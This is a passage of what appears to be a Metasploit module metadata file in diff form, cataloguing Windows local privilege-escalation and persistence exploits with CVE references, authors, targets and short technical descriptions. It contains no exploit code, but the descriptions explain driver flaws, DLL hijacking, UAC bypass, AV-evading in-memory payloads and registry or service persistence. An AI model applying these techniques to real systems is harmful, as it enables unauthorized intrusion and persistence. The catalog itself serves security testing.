It doesn't check the impersonation level\n of the token so it's possible to get an identify token on your thread from a local system\n process and bypass this check.\n\n This module currently only affects Windows 8 and Windows 8.1, and requires access to\n C:\\Windows\\System\\ComputerDefaults.exe (although this can be improved).", + "references": [ + "MSB-MS15-001", + "CVE-2015-0002", + "OSVDB-116497", + "EDB-35661", + "URL-https://code.google.com/p/google-security-research/issues/detail?id=118" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 8 / Windows 8.1 (x86 and x64)" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ntapphelpcachecontrol.rb", + "is_install_path": true, + "ref_name": "windows/local/ntapphelpcachecontrol", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ntusermndragover": { + "name": "Microsoft Windows NtUserMNDragOver Local Privilege Elevation", + "fullname": "exploit/windows/local/ntusermndragover", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-03-12", + "type": "exploit", + "author": [ + "Clément Lecigne", + "Grant Willcox", + "timwr" + ], + "description": "This module exploits a NULL pointer dereference vulnerability in\n MNGetpItemFromIndex(), which is reachable via a NtUserMNDragOver() system call.\n\n The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint()\n function does not effectively check the validity of the tagPOPUPMENU\n objects it processes before passing them on to MNGetpItemFromIndex(),\n where the NULL pointer dereference will occur.\n\n This module has been tested against Windows 7 x86 SP0 and SP1. 
Offsets\n within the solution may need to be adjusted to work with other versions\n of Windows, such as Windows Server 2008.", + "references": [ + "CVE-2019-0808", + "URL-https://github.com/exodusintel/CVE-2019-0808", + "URL-https://github.com/ze0r/cve-2019-0808-poc", + "URL-http://blogs.360.cn/post/RootCause_CVE-2019-0808_EN.html", + "URL-https://blog.exodusintel.com/2019/05/17/windows-within-windows/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 7 x86" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ntusermndragover.rb", + "is_install_path": true, + "ref_name": "windows/local/ntusermndragover", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-os-restarts" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/nvidia_nvsvc": { + "name": "Nvidia (nvsvc) Display Driver Service Local Privilege Escalation", + "fullname": "exploit/windows/local/nvidia_nvsvc", + "aliases": [], + "rank": 200, + "disclosure_date": "2012-12-25", + "type": "exploit", + "author": [ + "Peter Wintersmith", + "Ben Campbell " + ], + "description": "The named pipe, \\pipe\\nsvr, has a NULL DACL allowing any authenticated user to\n interact with the service. It contains a stacked based buffer overflow as a result\n of a memmove operation. 
Note the slight spelling differences: the executable is 'nvvsvc.exe',\n the service name is 'nvsvc', and the named pipe is 'nsvr'.\n\n This exploit automatically targets nvvsvc.exe versions dated Nov 3 2011, Aug 30 2012, and Dec 1 2012.\n It has been tested on Windows 7 64-bit against nvvsvc.exe dated Dec 1 2012.", + "references": [ + "CVE-2013-0109", + "OSVDB-88745", + "URL-http://nvidia.custhelp.com/app/answers/detail/a_id/3288" + ], + "platform": "Windows", + "arch": "x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/nvidia_nvsvc.rb", + "is_install_path": true, + "ref_name": "windows/local/nvidia_nvsvc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/panda_psevents": { + "name": "Panda Security PSEvents Privilege Escalation", + "fullname": "exploit/windows/local/panda_psevents", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-06-27", + "type": "exploit", + "author": [ + "h00die ", + "Security-Assessment.com" + ], + "description": "PSEvents.exe within several Panda Security products runs hourly with SYSTEM privileges.\n When run, it checks a user writable folder for certain DLL files, and if any are found\n they are automatically run.\n Vulnerable Products:\n Panda Global Protection 2016 (<=16.1.2)\n Panda Antivirus Pro 2016 (<=16.1.2)\n Panda Small Business Protection (<=16.1.2)\n Panda Internet Security 2016 (<=16.1.2)", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x86", + "Windows x64" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/panda_psevents.rb", + "is_install_path": true, + "ref_name": 
"windows/local/panda_psevents", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/payload_inject": { + "name": "Windows Manage Memory Payload Injection", + "fullname": "exploit/windows/local/payload_inject", + "aliases": [ + "post/windows/manage/payload_inject" + ], + "rank": 600, + "disclosure_date": "2011-10-12", + "type": "exploit", + "author": [ + "Carlos Perez ", + "sinn3r " + ], + "description": "This module will inject a payload into memory of a process. If a payload\n isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID\n datastore option isn't specified, then it'll inject into notepad.exe instead.", + "references": [], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/payload_inject.rb", + "is_install_path": true, + "ref_name": "windows/local/payload_inject", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/persistence": { + "name": "Windows Persistent Registry Startup Payload Installer", + "fullname": "exploit/windows/local/persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-10-19", + "type": "exploit", + "author": [ + "Carlos Perez ", + "g0tmi1k" + ], + "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": 
[ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/persistence_image_exec_options": { + "name": "Windows Silent Process Exit Persistence", + "fullname": "exploit/windows/local/persistence_image_exec_options", + "aliases": [], + "rank": 600, + "disclosure_date": "2008-06-28", + "type": "exploit", + "author": [ + "Mithun Shanbhag", + "bwatters-r7" + ], + "description": "Windows allows you to set up a debug process when a process exits.\n This module uploads a payload and declares that it is the debug\n process to launch when a specified process exits.", + "references": [ + "URL-https://attack.mitre.org/techniques/T1183/", + "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb", + "is_install_path": true, + "ref_name": "windows/local/persistence_image_exec_options", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/persistence_service": { + "name": "Windows Persistent Service Installer", + "fullname": "exploit/windows/local/persistence_service", + "aliases": [], + "rank": 600, + "disclosure_date": "2018-10-20", + "type": "exploit", + "author": [ + "Green-m " + ], + "description": "This Module will generate and upload an executable to a remote host, next will make it a persistent 
service.\n It will create a new service which will start the payload whenever the service is running. Admin or system\n privilege is required.", + "references": [ + "URL-https://github.com/rapid7/metasploit-framework/blob/master/external/source/metsvc/src/metsvc.cpp" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/persistence_service.rb", + "is_install_path": true, + "ref_name": "windows/local/persistence_service", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/plantronics_hub_spokesupdateservice_privesc": { + "name": "Plantronics Hub SpokesUpdateService Privilege Escalation", + "fullname": "exploit/windows/local/plantronics_hub_spokesupdateservice_privesc", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-08-30", + "type": "exploit", + "author": [ + "Markus Krell", + "bcoles " + ], + "description": "The Plantronics Hub client application for Windows makes use of an\n automatic update service `SpokesUpdateService.exe` which automatically\n executes a file specified in the `MajorUpgrade.config` configuration\n file as SYSTEM. 
The configuration file is writable by all users by default.\n\n This module has been tested successfully on Plantronics Hub version 3.13.2\n on Windows 7 SP1 (x64).", + "references": [ + "CVE-2019-15742", + "EDB-47845", + "URL-https://support.polycom.com/content/dam/polycom-support/global/documentation/plantronics-hub-local-privilege-escalation-vulnerability.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/plantronics_hub_spokesupdateservice_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/plantronics_hub_spokesupdateservice_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/powershell_cmd_upgrade": { + "name": "Windows Command Shell Upgrade (Powershell)", + "fullname": "exploit/windows/local/powershell_cmd_upgrade", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module executes Powershell to upgrade a Windows Shell session\n to a full Meterpreter session.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/local/powershell_cmd_upgrade.rb", + "is_install_path": true, + "ref_name": "windows/local/powershell_cmd_upgrade", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + 
"exploit_windows/local/powershell_remoting": { + "name": "Powershell Remoting Remote Command Execution", + "fullname": "exploit/windows/local/powershell_remoting", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Ben Campbell " + ], + "description": "This module uses Powershell Remoting (TCP 47001) to inject payloads on target machines.\n If RHOSTS are specified, it will try to resolve the IPs to hostnames, otherwise\n use a HOSTFILE to supply a list of known hostnames.", + "references": [ + "CVE-1999-0504", + "OSVDB-3106" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-08-08 01:40:15 +0000", + "path": "/modules/exploits/windows/local/powershell_remoting.rb", + "is_install_path": true, + "ref_name": "windows/local/powershell_remoting", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ppr_flatten_rec": { + "name": "Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation", + "fullname": "exploit/windows/local/ppr_flatten_rec", + "aliases": [], + "rank": 200, + "disclosure_date": "2013-05-15", + "type": "exploit", + "author": [ + "Tavis Ormandy ", + "progmboy ", + "Keebie4e", + "egypt ", + "sinn3r ", + "Ben Campbell ", + "juan vazquez ", + "OJ Reeves" + ], + "description": "This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage\n of uninitialized data which allows to corrupt memory. 
At the moment, the module has\n been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.", + "references": [ + "CVE-2013-3660", + "EDB-25912", + "OSVDB-93539", + "MSB-MS13-053", + "URL-https://seclists.org/fulldisclosure/2013/May/91" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/ppr_flatten_rec.rb", + "is_install_path": true, + "ref_name": "windows/local/ppr_flatten_rec", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ps_persist": { + "name": "Powershell Payload Execution", + "fullname": "exploit/windows/local/ps_persist", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-14", + "type": "exploit", + "author": [ + "RageLtMan ", + "Matt \"hostess\" Andreko" + ], + "description": "This module generates a dynamic executable on the session host using .NET templates.\n Code is pulled from C# templates and impregnated with a payload before being\n sent to a modified PowerShell session with .NET 4 loaded. The compiler builds\n the executable (standard or Windows service) in memory and produces a binary\n which can be started/installed and downloaded for later use. 
After compilation the\n PoweShell session can also sign the executable if provided a path the a .pfx formatted\n certificate.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ps_persist.rb", + "is_install_path": true, + "ref_name": "windows/local/ps_persist", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ps_wmi_exec": { + "name": "Authenticated WMI Exec via Powershell", + "fullname": "exploit/windows/local/ps_wmi_exec", + "aliases": [], + "rank": 600, + "disclosure_date": "2012-08-19", + "type": "exploit", + "author": [ + "RageLtMan " + ], + "description": "This module uses WMI execution to launch a payload instance on a remote machine.\n In order to avoid AV detection, all execution is performed in memory via psh-net\n encoded payload. Persistence option can be set to keep the payload looping while\n a handler is present to receive it. By default the module runs as the current\n process owner. 
The module can be configured with credentials for the remote host\n with which to launch the process.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/local/ps_wmi_exec.rb", + "is_install_path": true, + "ref_name": "windows/local/ps_wmi_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/pxeexploit": { + "name": "PXE Exploit Server", + "fullname": "exploit/windows/local/pxeexploit", + "aliases": [], + "rank": 600, + "disclosure_date": "2011-08-05", + "type": "exploit", + "author": [ + "scriptjunkie" + ], + "description": "This module provides a PXE server, running a DHCP and TFTP server.\n The default configuration loads a linux kernel and initrd into memory that\n reads the hard drive; placing the payload on the hard drive of any Windows\n partition seen.\n\n Note: the displayed IP address of a target is the address this DHCP server\n handed out, not the \"normal\" IP address the host uses.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Universal" + ], + "mod_time": "2022-03-10 18:03:35 +0000", + "path": "/modules/exploits/windows/local/pxeexploit.rb", + "is_install_path": true, + "ref_name": "windows/local/pxeexploit", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/local/razer_zwopenprocess": { + "name": "Razer Synapse rzpnk.sys ZwOpenProcess", + "fullname": "exploit/windows/local/razer_zwopenprocess", + "aliases": [], + "rank": 300, + "disclosure_date": "2017-03-22", + "type": "exploit", + 
"author": [ + "Spencer McIntyre" + ], + "description": "A vulnerability exists in the latest version of Razer Synapse\n (v2.20.15.1104 as of the day of disclosure) which can be leveraged\n locally by a malicious application to elevate its privileges to those of\n NT_AUTHORITY\\SYSTEM. The vulnerability lies in a specific IOCTL handler\n in the rzpnk.sys driver that passes a PID specified by the user to\n ZwOpenProcess. This can be issued by an application to open a handle to\n an arbitrary process with the necessary privileges to allocate, read and\n write memory in the specified process.\n\n This exploit leverages this vulnerability to open a handle to the\n winlogon process (which runs as NT_AUTHORITY\\SYSTEM) and infect it by\n installing a hook to execute attacker controlled shellcode. This hook is\n then triggered on demand by calling user32!LockWorkStation(), resulting\n in the attacker's payload being executed with the privileges of the\n infected winlogon process. In order for the issued IOCTL to work, the\n RazerIngameEngine.exe process must not be running. This exploit will\n check if it is, and attempt to kill it as necessary.\n\n The vulnerable software can be found here:\n https://www.razerzone.com/synapse/. 
No Razer hardware needs to be\n connected in order to leverage this vulnerability.\n\n This exploit is not opsec-safe due to the user being logged out as part\n of the exploitation process.", + "references": [ + "CVE-2017-9769", + "URL-https://warroom.securestate.com/cve-2017-9769/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows x64" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/razer_zwopenprocess.rb", + "is_install_path": true, + "ref_name": "windows/local/razer_zwopenprocess", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-restarts" + ], + "SideEffects": [ + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/registry_persistence": { + "name": "Windows Registry Only Persistence", + "fullname": "exploit/windows/local/registry_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2015-07-01", + "type": "exploit", + "author": [ + "Donny Maasland " + ], + "description": "This module will install a payload that is executed during boot.\n It will be executed either at user logon or system startup via the registry\n value in \"CurrentVersion\\Run\" (depending on privilege and selected method).\n The payload will be installed completely in registry.", + "references": [], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/local/registry_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/registry_persistence", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter", + "shell" + ], + 
"needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/ricoh_driver_privesc": { + "name": "Ricoh Driver Privilege Escalation", + "fullname": "exploit/windows/local/ricoh_driver_privesc", + "aliases": [], + "rank": 300, + "disclosure_date": "2020-01-22", + "type": "exploit", + "author": [ + "Alexander Pudwill", + "Pentagrid AG", + "Shelby Pace" + ], + "description": "Various Ricoh printer drivers allow escalation of\n privileges on Windows systems.\n\n For vulnerable drivers, a low-privileged user can\n read/write files within the `RICOH_DRV` directory\n and its subdirectories.\n\n `PrintIsolationHost.exe`, a Windows process running\n as NT AUTHORITY\\SYSTEM, loads driver-specific DLLs\n during the installation of a printer. A user can\n elevate to SYSTEM by writing a malicious DLL to\n the vulnerable driver directory and adding a new\n printer with a vulnerable driver.\n\n This module leverages the `prnmngr.vbs` script\n to add and delete printers. Multiple runs of this\n module may be required given successful exploitation\n is time-sensitive.", + "references": [ + "CVE-2019-19363", + "URL-https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2021-09-08 21:56:02 +0000", + "path": "/modules/exploits/windows/local/ricoh_driver_privesc.rb", + "is_install_path": true, + "ref_name": "windows/local/ricoh_driver_privesc", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "SideEffects": [ + "artifacts-on-disk" + ], + "Reliability": [ + "unreliable-session" + ], + "Stability": [ + "service-resource-loss" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/run_as": { + "name": "Windows Run Command As User", + "fullname": 
"exploit/windows/local/run_as", + "aliases": [], + "rank": 600, + "disclosure_date": "1999-01-01", + "type": "exploit", + "author": [ + "Kx499", + "Ben Campbell " + ], + "description": "This module will login with the specified username/password and execute the\n supplied command as a hidden process. Output is not returned by default.\n Unless targeting a local user either set the DOMAIN, or specify a UPN user\n format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function.\n\n A custom command line can be sent instead of uploading an executable.\n APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine\n respectively. See the MSDN documentation for how these two values interact.", + "references": [ + "URL-https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2022-06-29 19:18:47 +0000", + "path": "/modules/exploits/windows/local/run_as.rb", + "is_install_path": true, + "ref_name": "windows/local/run_as", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/s4u_persistence": { + "name": "Windows Manage User Level Persistent Payload Installer", + "fullname": "exploit/windows/local/s4u_persistence", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-01-02", + "type": "exploit", + "author": [ + "Thomas McCarthy \"smilingraccoon\" ", + "Brandon McCann \"zeknox\" " + ], + "description": "Creates a scheduled task that will run using service-for-user (S4U).\n This allows the scheduled task to run even as an unprivileged user\n that is not logged into the device. This will result in lower security\n context, allowing access to local resources only. 
The module\n requires 'Logon as a batch job' permissions (SeBatchLogonRight).", + "references": [ + "URL-http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/", + "URL-http://www.scriptjunkie.us/2013/01/running-code-from-a-non-elevated-account-at-any-time/" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/s4u_persistence.rb", + "is_install_path": true, + "ref_name": "windows/local/s4u_persistence", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "exploit_windows/local/service_permissions": { + "name": "Windows Escalate Service Permissions Local Privilege Escalation", + "fullname": "exploit/windows/local/service_permissions", + "aliases": [], + "rank": 500, + "disclosure_date": "2012-10-15", + "type": "exploit", + "author": [ + "scriptjunkie", + "Spencer McIntyre", + "itm4n" + ], + "description": "This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure configuration, file or registry permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. 
This will result in a new session when this succeeds.", + "references": [ + "URL-https://itm4n.github.io/windows-registry-rpceptmapper-eop/", + "URL-https://birkep.github.io/posts/Windows-LPE/", + "CVE-2025-21293" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Exploit CVE-2025-21293" + ], + "mod_time": "2025-04-17 09:43:13 +0000", + "path": "/modules/exploits/windows/local/service_permissions.rb", + "is_install_path": true, + "ref_name": "windows/local/service_permissions", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/srclient_dll_hijacking": { + "name": "Windows Server 2012 SrClient DLL hijacking", + "fullname": "exploit/windows/local/srclient_dll_hijacking", + "aliases": [], + "rank": 300, + "disclosure_date": "2021-02-19", + "type": "exploit", + "author": [ + "Erik Wynter" + ], + "description": "All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL\n hijacking due to the way TiWorker.exe will try to call the non-existent\n `SrClient.dll` file when Windows Update checks for updates. This issue can be\n leveraged for privilege escalation if %PATH% includes directories that are\n writable by low-privileged users. 
The attack can be triggered by any\n low-privileged user and does not require a system reboot.\n\n This module has been successfully tested on Windows Server 2012 (x64).", + "references": [ + "URL-https://blog.vonahi.io/srclient-dll-hijacking" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows Server 2012 (x64)" + ], + "mod_time": "2023-02-10 18:04:31 +0000", + "path": "/modules/exploits/windows/local/srclient_dll_hijacking.rb", + "is_install_path": true, + "ref_name": "windows/local/srclient_dll_hijacking", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "screen-effects" + ], + "Reliability": [ + "unreliable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/tokenmagic": { + "name": "Windows Privilege Escalation via TokenMagic (UAC Bypass)", + "fullname": "exploit/windows/local/tokenmagic", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-25", + "type": "exploit", + "author": [ + "James Forshaw", + "Ruben Boonen ( ", + "bwatters-r7", + "jheysel-r7" + ], + "description": "This module leverages a UAC bypass (TokenMagic) in order to spawn a process/conduct a DLL\n hijacking attack to gain SYSTEM-level privileges. 
Windows 7 through Windows 10 1803\n are affected.", + "references": [ + "URL-https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1", + "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html", + "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html", + "URL-https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic" + ], + "mod_time": "2023-05-25 12:45:30 +0000", + "path": "/modules/exploits/windows/local/tokenmagic.rb", + "is_install_path": true, + "ref_name": "windows/local/tokenmagic", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/unquoted_service_path": { + "name": "Windows Unquoted Service Path Privilege Escalation", + "fullname": "exploit/windows/local/unquoted_service_path", + "aliases": [], + "rank": 500, + "disclosure_date": "2001-10-25", + "type": "exploit", + "author": [ + "sinn3r ", + "h00die" + ], + "description": "This module exploits a logic flaw due to how the lpApplicationName parameter\n is handled. When the lpApplicationName contains a space, the file name is\n ambiguous. 
Take this file path as example: C:\\program files\\hello.exe;\n The Windows API will try to interpret this as two possible paths:\n C:\\program.exe, and C:\\program files\\hello.exe, and then execute all of them.\n To some software developers, this is an unexpected behavior, which becomes a\n security problem if an attacker is able to place a malicious executable in one\n of these unexpected paths, sometimes escalate privileges if run as SYSTEM.\n Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the\n same problem.\n\n The offensive technique is also described in Writing Secure Code (2nd Edition),\n Chapter 23, in the section \"Calling Processes Security\" on page 676.\n\n This technique was previously called Trusted Service Path, but is more commonly\n known as Unquoted Service Path.\n\n The service exploited won't start until the payload written to disk is removed.", + "references": [ + "URL-http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx", + "URL-http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us", + "URL-https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows" + ], + "mod_time": "2025-04-13 16:34:03 +0000", + "path": "/modules/exploits/windows/local/unquoted_service_path.rb", + "is_install_path": true, + "ref_name": "windows/local/unquoted_service_path", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "SideEffects": [ + "artifacts-on-disk", + "config-changes" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "exploit_windows/local/virtual_box_guest_additions": { + "name": "VirtualBox Guest Additions VBoxGuest.sys Privilege 
